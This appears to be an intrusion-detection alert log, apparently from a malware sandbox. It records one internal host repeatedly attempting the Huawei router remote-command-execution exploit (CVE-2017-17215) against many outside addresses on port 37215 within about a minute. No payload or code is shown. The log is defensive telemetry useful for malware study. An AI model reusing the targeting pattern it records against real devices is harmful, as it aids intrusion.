                                                        06/13/24-21:32:25.977204TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4199637215192.168.2.14156.8.206.169
                                                        06/13/24-21:32:13.543442TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4700437215192.168.2.14156.135.41.46
                                                        06/13/24-21:32:36.243338TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4050837215192.168.2.14197.115.179.22
                                                        06/13/24-21:33:13.230577TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4233237215192.168.2.14156.125.60.168
                                                        06/13/24-21:33:07.039734TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3707837215192.168.2.14156.237.239.23
                                                        06/13/24-21:32:09.439708TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3843437215192.168.2.14197.107.36.180
                                                        06/13/24-21:33:00.870919TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3448037215192.168.2.1441.100.226.215
                                                        06/13/24-21:33:13.211412TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4729637215192.168.2.14156.40.201.195
                                                        06/13/24-21:33:02.909554TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4201437215192.168.2.1441.207.143.122
                                                        06/13/24-21:33:13.232086TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5279837215192.168.2.14156.62.175.247
                                                        06/13/24-21:32:56.792246TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4259437215192.168.2.1441.55.101.122
                                                        06/13/24-21:32:36.269241TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3843837215192.168.2.14156.147.130.207
                                                        06/13/24-21:32:36.244473TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3974837215192.168.2.14197.67.228.129
                                                        06/13/24-21:32:44.475056TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5956837215192.168.2.14197.199.53.87
                                                        06/13/24-21:33:07.041735TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3646637215192.168.2.14197.133.77.15
                                                        06/13/24-21:32:25.997066TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6032637215192.168.2.14156.211.111.85
                                                        06/13/24-21:32:58.841466TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5302037215192.168.2.1441.45.97.173
                                                        06/13/24-21:32:01.241922TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3487637215192.168.2.1441.209.91.127
                                                        06/13/24-21:32:11.506404TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4314837215192.168.2.1441.214.113.148
                                                        06/13/24-21:32:34.192732TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3876037215192.168.2.1441.9.165.167
                                                        06/13/24-21:32:05.349067TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5193637215192.168.2.1441.55.197.133
                                                        06/13/24-21:32:17.695228TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3568637215192.168.2.1441.182.171.204
                                                        06/13/24-21:32:42.421237TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4694037215192.168.2.14156.27.1.207
                                                        06/13/24-21:32:07.400525TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3504837215192.168.2.14197.140.108.117
                                                        06/13/24-21:32:15.629752TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5652637215192.168.2.1441.12.220.132
                                                        06/13/24-21:33:15.277399TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4669437215192.168.2.1441.2.157.81
                                                        06/13/24-21:31:59.177190TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3717237215192.168.2.14156.203.240.233
                                                        06/13/24-21:32:01.220388TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4156837215192.168.2.14197.20.19.32
                                                        06/13/24-21:33:02.913796TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5877437215192.168.2.14156.69.119.157
                                                        06/13/24-21:32:01.220656TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4487837215192.168.2.14197.57.79.65
                                                        06/13/24-21:32:05.349625TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3460637215192.168.2.14197.80.97.235
                                                        06/13/24-21:33:11.160909TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3726237215192.168.2.1441.69.138.154
                                                        06/13/24-21:31:57.131692TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4152437215192.168.2.14197.226.89.160
                                                        06/13/24-21:32:28.025624TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5941637215192.168.2.14156.168.46.249
                                                        06/13/24-21:32:50.613701TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5638837215192.168.2.14197.251.190.201
                                                        06/13/24-21:32:07.417658TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5291037215192.168.2.14197.13.225.114
                                                        06/13/24-21:32:23.941797TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3700237215192.168.2.14156.156.163.8
                                                        06/13/24-21:33:04.988866TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5170837215192.168.2.14197.24.77.221
                                                        06/13/24-21:32:25.991990TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6038237215192.168.2.1441.139.94.186
                                                        06/13/24-21:32:05.346959TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4860037215192.168.2.14156.217.87.42
                                                        06/13/24-21:32:40.353541TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3744437215192.168.2.1441.96.118.189
                                                        06/13/24-21:33:00.867553TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4932037215192.168.2.14156.96.205.109
                                                        06/13/24-21:32:13.547443TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3362637215192.168.2.14156.149.192.244
                                                        06/13/24-21:32:05.350425TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5482637215192.168.2.14156.106.248.200
                                                        06/13/24-21:31:59.195337TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5619437215192.168.2.14156.66.12.61
                                                        06/13/24-21:32:52.656041TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5128637215192.168.2.1441.188.148.162
                                                        06/13/24-21:32:46.502448TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4951637215192.168.2.1441.193.205.201
                                                        06/13/24-21:33:05.016461TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4371237215192.168.2.14197.46.91.51
                                                        06/13/24-21:32:44.477709TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3704037215192.168.2.1441.237.182.105
                                                        06/13/24-21:32:21.804612TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4472637215192.168.2.14197.176.179.225
                                                        06/13/24-21:33:09.089574TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5930237215192.168.2.14197.61.120.47
                                                        06/13/24-21:32:36.265516TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4355037215192.168.2.1441.237.221.6
                                                        06/13/24-21:32:44.452272TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5602837215192.168.2.1441.163.210.69
                                                        06/13/24-21:32:03.277624TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6081637215192.168.2.14197.245.198.17
                                                        06/13/24-21:32:11.486750TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5341237215192.168.2.1441.127.90.185
                                                        06/13/24-21:32:58.825009TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4918237215192.168.2.14197.15.1.123
                                                        06/13/24-21:33:00.867218TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4197637215192.168.2.14197.219.43.166
                                                        06/13/24-21:32:56.759392TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6031637215192.168.2.14156.216.247.154
                                                        06/13/24-21:32:05.377303TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5205237215192.168.2.1441.69.169.65
                                                        06/13/24-21:33:05.014210TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5085437215192.168.2.14156.187.132.35
                                                        06/13/24-21:32:46.528039TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5555237215192.168.2.1441.185.248.45
                                                        06/13/24-21:32:28.027400TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5029237215192.168.2.14156.149.67.201
                                                        06/13/24-21:32:48.550596TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5359437215192.168.2.14197.191.60.55
                                                        06/13/24-21:33:13.229462TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5056637215192.168.2.14197.234.250.195
                                                        06/13/24-21:32:01.223518TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4173037215192.168.2.1441.8.81.143
                                                        06/13/24-21:32:44.480118TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5080437215192.168.2.14156.178.189.154
                                                        06/13/24-21:32:56.759156TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4224437215192.168.2.1441.42.133.110
                                                        06/13/24-21:31:59.197633TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5022437215192.168.2.14197.187.191.53
                                                        06/13/24-21:32:38.302631TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5549037215192.168.2.14156.191.170.63
                                                        06/13/24-21:33:15.271656TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4195437215192.168.2.14197.142.92.135
                                                        06/13/24-21:32:54.710889TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5620237215192.168.2.14156.206.39.225
                                                        06/13/24-21:33:02.908902TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5936237215192.168.2.14197.108.206.136
                                                        06/13/24-21:32:23.941032TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6058437215192.168.2.14156.141.9.240
                                                        06/13/24-21:33:02.910222TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5663637215192.168.2.1441.100.62.119
                                                        06/13/24-21:32:01.242064TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5011237215192.168.2.1441.175.223.98
                                                        06/13/24-21:32:25.991870TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4088837215192.168.2.1441.108.222.74
                                                        06/13/24-21:33:07.042127TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4609037215192.168.2.14197.241.160.64
                                                        06/13/24-21:32:34.218194TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5538237215192.168.2.14156.62.94.110
                                                        06/13/24-21:32:58.839077TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4236837215192.168.2.14197.45.45.28
                                                        06/13/24-21:33:09.129716TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3482837215192.168.2.1441.224.14.34
                                                        06/13/24-21:32:42.424958TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5789037215192.168.2.1441.172.125.245
                                                        06/13/24-21:32:11.487102TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4987037215192.168.2.1441.151.102.69
                                                        06/13/24-21:32:34.195857TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3939437215192.168.2.14197.137.160.4
                                                        06/13/24-21:32:07.402706TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4574837215192.168.2.14197.247.1.234
                                                        06/13/24-21:32:11.485707TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3652437215192.168.2.14197.153.125.69
                                                        06/13/24-21:33:00.868361TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3433037215192.168.2.14197.235.15.148
                                                        06/13/24-21:32:25.972384TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5721837215192.168.2.1441.201.120.215
                                                        06/13/24-21:31:57.092203TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4028437215192.168.2.1441.8.213.120
                                                        06/13/24-21:32:46.528016TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5767437215192.168.2.14197.17.22.221
                                                        06/13/24-21:32:48.553212TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4959637215192.168.2.1441.196.173.57
                                                        06/13/24-21:32:42.408002TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3358637215192.168.2.1441.233.217.197
                                                        06/13/24-21:32:46.523779TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5822837215192.168.2.14197.26.204.249
                                                        06/13/24-21:32:17.694344TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6000837215192.168.2.1441.131.238.147
                                                        06/13/24-21:32:52.660355TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5061837215192.168.2.1441.27.160.206
                                                        06/13/24-21:32:36.264731TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3828237215192.168.2.14197.214.127.32
                                                        06/13/24-21:32:17.679188TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4864437215192.168.2.1441.102.157.22
                                                        06/13/24-21:32:58.823415TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4245437215192.168.2.14197.254.11.100
                                                        06/13/24-21:32:11.487708TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4409237215192.168.2.14156.112.189.27
                                                        06/13/24-21:32:15.606499TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5041037215192.168.2.14156.193.187.78
                                                        06/13/24-21:32:36.268957TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5582437215192.168.2.14197.144.199.189
                                                        06/13/24-21:32:42.403560TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4606637215192.168.2.14197.127.112.147
                                                        06/13/24-21:32:15.638386TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3533637215192.168.2.14156.216.143.38
                                                        06/13/24-21:32:13.565118TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4832237215192.168.2.14156.152.161.212
                                                        06/13/24-21:33:07.058368TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4922037215192.168.2.14156.209.81.99
                                                        06/13/24-21:32:25.991036TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4933037215192.168.2.1441.60.78.49
                                                        06/13/24-21:32:01.223016TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4921837215192.168.2.14156.80.77.144
                                                        06/13/24-21:33:07.057413TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3597837215192.168.2.14197.160.247.1
                                                        06/13/24-21:32:03.276749TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6087437215192.168.2.14156.145.120.237
                                                        06/13/24-21:32:52.657016TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5049437215192.168.2.1441.12.46.91
                                                        06/13/24-21:32:19.754865TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3359037215192.168.2.1441.20.227.52
                                                        06/13/24-21:32:17.675391TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5333237215192.168.2.14156.186.74.215
                                                        06/13/24-21:31:59.197884TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4389437215192.168.2.14197.161.140.105
                                                        06/13/24-21:33:09.084873TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3904637215192.168.2.1441.33.66.45
                                                        06/13/24-21:32:54.726549TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4580837215192.168.2.1441.78.106.180
                                                        06/13/24-21:32:09.439685TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5066037215192.168.2.1441.117.69.224
                                                        06/13/24-21:33:13.213962TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3793637215192.168.2.14156.211.246.77
                                                        06/13/24-21:32:13.565281TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3384637215192.168.2.1441.185.148.47
                                                        06/13/24-21:32:56.790524TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5966837215192.168.2.14156.183.126.250
                                                        06/13/24-21:32:17.675448TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5786637215192.168.2.1441.38.20.70
                                                        06/13/24-21:32:32.169141TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3632837215192.168.2.14197.39.227.56
                                                        06/13/24-21:32:46.503782TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4910437215192.168.2.1441.26.121.119
                                                        06/13/24-21:32:01.222263TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5103837215192.168.2.1441.69.45.122
                                                        06/13/24-21:32:01.241321TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5410837215192.168.2.14197.153.191.27
                                                        06/13/24-21:32:34.193512TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4917837215192.168.2.14156.29.166.186
                                                        06/13/24-21:32:34.213465TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4093237215192.168.2.14197.175.152.153
                                                        06/13/24-21:32:56.790432TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3470237215192.168.2.14197.156.29.201
                                                        06/13/24-21:32:52.676512TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3324237215192.168.2.1441.44.143.240
                                                        06/13/24-21:32:30.092118TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4397837215192.168.2.14156.192.77.226
                                                        06/13/24-21:32:34.193083TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3594837215192.168.2.1441.252.134.89
                                                        06/13/24-21:33:13.212692TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4669237215192.168.2.1441.155.104.201
                                                        06/13/24-21:32:34.217830TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4447637215192.168.2.14197.102.87.116
                                                        06/13/24-21:32:54.711338TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4012237215192.168.2.14197.114.172.192
                                                        06/13/24-21:32:48.549659TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3709637215192.168.2.1441.121.67.138
                                                        06/13/24-21:32:13.545128TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5539837215192.168.2.14197.179.146.193
                                                        06/13/24-21:32:34.213920TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3503237215192.168.2.14156.117.227.235
                                                        06/13/24-21:32:48.572035TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6003037215192.168.2.14197.116.68.181
                                                        06/13/24-21:32:09.457973TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5758837215192.168.2.1441.165.136.96
                                                        06/13/24-21:33:09.130534TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5294037215192.168.2.14156.154.72.148
                                                        06/13/24-21:33:00.889504TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5895037215192.168.2.14156.230.102.29
                                                        06/13/24-21:32:52.676431TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4046237215192.168.2.14156.12.200.206
                                                        06/13/24-21:32:58.824800TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3902837215192.168.2.14197.116.148.195
                                                        06/13/24-21:33:02.911471TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5577237215192.168.2.14156.135.148.41
                                                        06/13/24-21:32:01.248205TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5795837215192.168.2.1441.254.4.120
                                                        06/13/24-21:33:00.870192TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5544037215192.168.2.1441.162.72.167
                                                        06/13/24-21:32:52.656683TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3623237215192.168.2.1441.141.145.252
                                                        06/13/24-21:32:21.781041TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3707037215192.168.2.1441.99.111.197
                                                        06/13/24-21:32:28.025677TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3388837215192.168.2.1441.208.56.234
                                                        06/13/24-21:32:50.633472TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3750237215192.168.2.14197.36.58.169
                                                        06/13/24-21:33:07.040984TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3545837215192.168.2.14197.18.160.178
                                                        06/13/24-21:32:17.672061TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5395637215192.168.2.1441.19.253.57
                                                        06/13/24-21:32:34.196923TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5989237215192.168.2.14197.189.223.14
                                                        06/13/24-21:31:57.092645TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4122237215192.168.2.14197.27.187.97
                                                        06/13/24-21:32:01.222633TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5105637215192.168.2.14197.107.126.192
                                                        06/13/24-21:32:50.632320TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3314237215192.168.2.14197.68.251.253
                                                        06/13/24-21:32:15.607256TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3758637215192.168.2.14197.86.3.130
                                                        06/13/24-21:33:05.014251TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4437237215192.168.2.14197.219.197.127
                                                        06/13/24-21:32:42.419921TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5084637215192.168.2.1441.165.34.188
                                                        06/13/24-21:33:09.110278TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6013237215192.168.2.1441.254.26.51
                                                        06/13/24-21:33:11.157809TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4013237215192.168.2.14197.224.105.238
                                                        06/13/24-21:32:54.726810TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5036837215192.168.2.14197.145.139.139
                                                        06/13/24-21:33:11.180377TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3335637215192.168.2.14156.219.86.163
                                                        06/13/24-21:32:28.023852TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4341837215192.168.2.14197.199.19.231
                                                        06/13/24-21:32:38.323992TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4148437215192.168.2.1441.249.125.80
                                                        06/13/24-21:32:21.782610TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4079437215192.168.2.14156.120.86.104
                                                        06/13/24-21:32:28.042986TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5314637215192.168.2.1441.153.108.83
                                                        06/13/24-21:32:52.679340TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5004837215192.168.2.14156.62.92.155
                                                        06/13/24-21:32:19.749491TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3387237215192.168.2.1441.29.140.219
                                                        06/13/24-21:32:32.169384TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3412037215192.168.2.14197.38.69.189
                                                        06/13/24-21:33:11.177847TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6025437215192.168.2.1441.133.229.212
                                                        06/13/24-21:31:59.174994TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4516637215192.168.2.14197.79.223.191
                                                        06/13/24-21:33:09.130968TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5346237215192.168.2.14156.97.85.91
                                                        06/13/24-21:32:56.754764TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5156437215192.168.2.14197.55.75.51
                                                        06/13/24-21:32:34.217314TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3836837215192.168.2.14197.214.226.158
                                                        06/13/24-21:33:13.212320TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3305237215192.168.2.1441.52.52.44
                                                        06/13/24-21:32:11.506753TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3420437215192.168.2.14156.214.73.211
                                                        06/13/24-21:32:50.610624TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5889237215192.168.2.14156.83.2.109
                                                        06/13/24-21:32:03.308395TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5083037215192.168.2.14156.114.73.197
                                                        06/13/24-21:33:15.257316TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4911637215192.168.2.14156.244.221.147
                                                        06/13/24-21:32:19.752957TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3308437215192.168.2.14197.59.135.175
                                                        06/13/24-21:32:03.308321TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3433437215192.168.2.14197.191.40.151
                                                        06/13/24-21:32:11.509070TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5202037215192.168.2.14197.177.200.131
                                                        06/13/24-21:32:44.456516TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4118437215192.168.2.1441.103.187.188
                                                        06/13/24-21:32:15.605041TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3637037215192.168.2.14197.165.99.31
                                                        06/13/24-21:31:57.093228TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5079237215192.168.2.14156.194.215.17
                                                        06/13/24-21:33:07.058633TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3598437215192.168.2.14156.41.73.12
                                                        06/13/24-21:33:15.254578TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3961637215192.168.2.14156.184.232.228
